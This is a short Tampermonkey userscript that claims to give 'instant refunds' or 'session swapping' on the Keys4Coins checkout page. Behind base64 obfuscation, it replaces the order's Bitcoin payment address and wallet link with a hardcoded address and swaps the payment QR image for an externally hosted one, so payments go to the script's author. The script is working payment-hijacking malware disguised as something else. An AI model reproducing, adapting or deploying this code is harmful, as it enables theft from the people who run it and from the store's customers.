// New Script Updated April 2023
// ==UserScript==
// @name         Keys4Coins Instant Refund / Session Swapping
// @namespace    http://tampermonkey.net/
// @version      2023
// @description  vampmoon forever
// @author       Premium Leaks
// @match        https://www.keys4coins.com/checkout/order-pay*
// @icon         https://www.google.com/s2/favicons?sz=64&domain=keys4coins.com
// ==/UserScript==
(()=>{const _=s=>atob(s),A=_('M0NzZnk4V0gyd2lEaHp0YkRncld2VFpLM2NzVGJrQjYzNg=='),B=_('aHR0cHM6Ly9pLmltZ3VyLmNvbS9Sc2IyR2VPLnBuZw=='),C=_('aHR0cHM6Ly9pLmltZ3VyLmNvbS85MG82U2haLnBuZw=='),D=document;try{D.getElementById('payment-address').textContent=A;let i=D.createElement('img');i.src=B;D.body.appendChild(i);D.querySelector('[title="Scan QR code or click to open wallet client."]').href='bitcoin:'+A+'?amount=0.009356&label=Keys4Coins%20Order%20279340'}catch(e){}for(let x of D.getElementsByTagName('img'))x.src===C&&(x.src=B)})();
